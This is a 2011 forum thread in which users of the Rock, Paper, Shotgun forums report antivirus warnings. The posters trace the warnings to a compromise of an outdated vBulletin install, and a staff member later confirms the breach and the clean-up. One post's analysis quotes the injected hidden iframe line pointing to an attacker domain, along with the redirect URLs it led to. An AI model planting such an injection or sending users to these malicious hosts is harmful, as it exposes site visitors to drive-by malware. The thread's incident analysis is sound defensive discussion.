Results 1 to 20 of 20
  1. #1
    Secondary Hivemind Nexus squirrel's Avatar
    Join Date
    Jun 2011
    Posts
    1,620

    RPS Forums Site Contains Malicious Ware?

    I am using avast! and here is the warning by it whenever I turn to a new page within the forum:

    Infection Details

    URL:http://kokosina.in/1Process:file://C:\Program Files (x86)\Mozilla Fi...Infection:al
    I suspect it's the advertisement that has problem as the background advertisement is currently blocked by my machine.

    It's so creepy zako!

  2. #2
    Secondary Hivemind Nexus thegooseking's Avatar
    Join Date
    Jun 2011
    Location
    Three miles from the nearest bus stop
    Posts
    1,097
    I posted about this in forum feedback. It's affecting a lot of vBulletin sites and there's a thread about it here.
    "Moronic cynicism is a kind of naïveté. It's naïveté turned inside-out. Naïveté wearing a sneer." -Momus

  3. #3
    Network Hub lhzr's Avatar
    Join Date
    Jun 2011
    Location
    RO
    Posts
    116
    yeah, i get this too.

    should we consider our passwords stolen ? what does this kokosina thing do ?

  4. #4
    Secondary Hivemind Nexus Vexing Vision's Avatar
    Join Date
    Jun 2011
    Location
    Düsseldorf
    Posts
    1,772
    Same, but I get the error message also for the main page, where background ads are running fine.
    NETWORKING 101 SIGNATURE INCOMING
    Playing games with each other makes for the best business contacts, so feel free to add me on LinkedIn.
    You should also follow me on Twitter.

  5. #5
    Lesser Hivemind Node Kaira-'s Avatar
    Join Date
    Jul 2011
    Location
    Oulu, Finland
    Posts
    965
    Not sure if it's been there always, but I noticed that browser attempts to connect to 212.224.112.13, and whois for that seems like this:


    inetnum: 212.224.112.0 - 212.224.112.255
    netname: DE-FORNEX
    descr: www.fornex.com, Fornex Hosting S.L
    country: DE
    admin-c: COLO-RIPE
    tech-c: COLO-RIPE
    remarks: -------------------------------------------------------
    remarks: --- please report spam/abuse to abuse@first-colo.de ---
    remarks: ---- reports to other addresses won't be processed ----
    remarks: -------------------------------------------------------
    status: ASSIGNED PA
    mnt-by: MNT-FIRSTCOLO
    source: RIPE # Filtered

    role: First Colo Ripe Coordination
    address: First Colo GmbH
    address: Kastelburgstr. 74c
    address: D-81245 Muenchen
    address: Germany
    phone: +49-(0)800-25557777
    fax-no: +49-(0)800-25557770
    abuse-mailbox: abuse@first-colo.de
    remarks:
    remarks: * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
    remarks: * Complaints about Internet Abuse like SPAM, Hack Attacks, Scans, etc. *
    remarks: * please mail to: --> abuse [@] first-colo [.] net <-- *
    remarks: * Requests from law enforcement (only!), send fax to: +49 800 25557770 *
    remarks: * Inquiries can only be processed, if sent to the correct address. *
    remarks: * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
    remarks:
    admin-c: MAVE-RIPE
    tech-c: MAVE-RIPE
    nic-hdl: COLO-RIPE
    mnt-by: MNT-FIRSTCOLO
    source: RIPE # Filtered

    % Information related to '212.224.64.0/18AS44066'

    route: 212.224.64.0/18
    descr: First Colo via AS44066
    origin: AS44066
    mnt-by: MNT-FIRSTCOLO
    source: RIPE # Filtered

    % Information related to '212.224.112.0/20AS44066'

    route: 212.224.112.0/20
    descr: First Colo via AS44066
    origin: AS44066
    mnt-by: MNT-FIRSTCOLO
    source: RIPE # Filtered

  6. #6
    Network Hub Miker's Avatar
    Join Date
    Jun 2011
    Location
    St. Louis
    Posts
    177
    Same here, I had to put RPS in my exceptions just to get here.

  7. #7
    Network Hub Duckee's Avatar
    Join Date
    Oct 2011
    Posts
    191
    It is also flagged by Opera as a malware threat.

  8. #8
    Network Hub Megagun's Avatar
    Join Date
    Jun 2011
    Posts
    254
    WARNING: do NOT visit any of the links I'm about to post unless you know what you're doing, you think you know what you're doing, or you don't care what happens to your PC either way. That said, some of these links I'm about to post should be safe, and I'll mark them as such.

    Yep, there's definitively something wrong here. This is what I found inside the source of this page:
    Code:
    <div style="display:none;"><iframe src="http://kokosina.in/t/go.php?sid=5" width="38" height="67" border="0" frameborder="0"></iframe></div>
    Awesome, an iFrame!
    Wgetting the kokosina.in URL gives me a 302 redirect to
    Code:
    http://212.224.112.13/nicto141211/c057cc4c4388afa8baf248cbaecfa8e7/spl.php
    Following that, we get another 302 redirect to
    Code:
    http://212.224.112.13/nicto141211/c057cc4c4388afa8baf248cbaecfa8e7/0.php
    Which in turn redirects to http://www.google.com/robots.txt for some reason, which is rather odd... Why would they redirect me to google's robots.txt?

    EDIT: the iFrame is injected by the following bit of javascript code:
    http://pastebin.com/XsmMHBza (this should be safe to visit if you want to look at some JavaScript, but don't be alarmed if your virus scanner thinks this is a virus, too. Some do that).

    I've seen that kind of thing before. Nasty decoding/evalling stuff. This bit of javascript is hosted at
    Code:
    http://kokosina.in/1
    Virustotal's output for that little bit of Javascript (this is a safe link). Oddly enough, it's not detected by many virus scanners, but I bet that they do detect whatever the output of that bit of Javascript is (the actual iFrame injection).

    EDIT: Checked the link posted by thegooseking, which says the following:
    You're using vBulletin 4.1.3. There are several exploits in that version that were fixed in subsequent versions and security patches. You should upgrade to vBulletin 4.1.9. You also need to make sure your addons are up to date so that they don't have potential exploits in them.
    The RPS forums are running 4.1.3. There are known exploits for that version. The forum software should be updated. Someone used a known exploit to inject some code (probably automatically), which means they probably have (had?) access to the server, which may mean that they know your password, depending on what they modified. Be vigilant, but changing your password now may be a bit silly until the forum software has been patched to deal with this intrusion. That said, I know that vBulletin by default uses some proper salting techniques, so you might be somewhat safe (again, depending on which files were modified, and in what way they were modified).
    Last edited by Megagun; 20-12-2011 at 08:59 PM. Reason: Moved the JavaScript to Pastebin, so that my post isn't flagged as containing a virus by your virus scanner. :)

  9. #9
    Network Hub
    Join Date
    Jun 2011
    Posts
    118
    Sooo is the site safe now or not...

  10. #10
    Lesser Hivemind Node Kodeen's Avatar
    Join Date
    Jun 2011
    Location
    USA
    Posts
    968
    Quote Originally Posted by Ice-Fyre View Post
    Sooo is the site safe now or not...
    They upgraded the forum version, I'm assuming in response to this thread, so ... maybe?

  11. #11
    Vector Jams O'Donnell's Avatar
    Join Date
    May 2011
    Location
    Burgh of Mussels
    Posts
    830
    Yes, the malware has been eliminated.

  12. #12
    Network Hub Megagun's Avatar
    Join Date
    Jun 2011
    Posts
    254
    Regardless, change your password and remember to change it on other websites where you used the same password. If someone was able to inject an iFrame, they were able to inject other nasty stuff.

    As far as I was able to detect, the nasty bits we talked about in this thread have been cleaned up and fixed. Not sure if there's more nastyness somewhere else, but at least this particular case of nastyness has been dealt with.

  13. #13
    Would be nice if RPS could post a quick bit on the front page that they've been compromised and that people should consider taking protective measures.
    "You go up to a man, and you say, "How are things going, Joe?" and he says, "Oh fine, fine — couldn't be better." And you look into his eyes, and you see things really couldn't be much worse. When you get right down to it, everybody's having a perfectly lousy time of it, and I mean everybody. And the hell of it is, nothing seems to help much." - Kurt Vonnegut, Jr.

  14. #14
    Secondary Hivemind Nexus Smashbox's Avatar
    Join Date
    Jul 2011
    Location
    Boston
    Posts
    2,088
    Or at least a thread...

  15. #15
    Network Hub Megagun's Avatar
    Join Date
    Jun 2011
    Posts
    254
    *tumbleweed*

  16. #16
    Lesser Hivemind Node DigitalSignalX's Avatar
    Join Date
    Jun 2011
    Location
    USA, Missouri.
    Posts
    934
    Didn't the upgrade to 4.1.9 fix it?
    All times I have enjoyed greatly, have suffered greatly, both with those that loved me, and alone.

  17. #17
    Network Hub Megagun's Avatar
    Join Date
    Jun 2011
    Posts
    254
    Yes, it may have (it depends on what the breach was and if anything other than the forum software was affected), but no-one who has an account here and happens to read the "Rock, Paper Shotgun Discussion" forum would know about what happened, and nowhere was anything clarified with regards to what happened and how severe the breach was.

    Right now, we have to assume that all passwords and user accounts/e-mail addresses were stolen, until we hear some official words regarding these matters (and proper investigation has been done). This also means that not sending a mass-email out to anyone who has an account here is a huge oversight.

  18. #18
    Obscure Node kirrus's Avatar
    Join Date
    Jun 2011
    Location
    Planet Earth.
    Posts
    71
    I've been meaning to post for a while, sorry, didn't quite get round to it.

    The forums were breached by an injection vulnerability in vBulletin. It was an automated breach - very, very little human involvement. It didn't go beyond the forums - the main site was unaffected (hence it staying online when we took the forums offline). As far as we can determine, they didn't steal any data, and only injected nefarious code into the site. It was cleaned out after we took the forums down - we took a copy of the code, reloaded the forum files from backups, updated the forums and brought them back online.

    As to password security, they are stored salted and encrypted. As with any security matter, using the same password on multiple sites, as tempting as it is, is a bad idea, and we recommend against you doing that.

    The reason an email didn't go out, was due to the lack of data theft - be assured, we would ask the RPS team to let you know if we did have evidence of emails/passwords/usernames being downloaded.
    Last edited by kirrus; 11-01-2012 at 01:50 PM. Reason: Added a bit.

  19. #19
    Obscure Node
    Join Date
    Jun 2014
    Location
    philippines
    Posts
    15
    oh men, i hope i dont get that malware. awww. (my comp is sensitive)

  20. #20
    Moderator QuantaCat's Avatar
    Join Date
    Jun 2011
    Location
    Vienna, Austria
    Posts
    5,815
    last warning, stop posting on threads just to get your post count up. This is a thread that stopped being useful two years ago.
    - Tom De Roeck.

    monochrom & verse publications

    "Quantacat's name is still recognised even if he watches on with detached eyes like Peter Molyneux over a cube in 3D space, staring at it with tears in his eyes, softly whispering... Someday they'll get it."

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •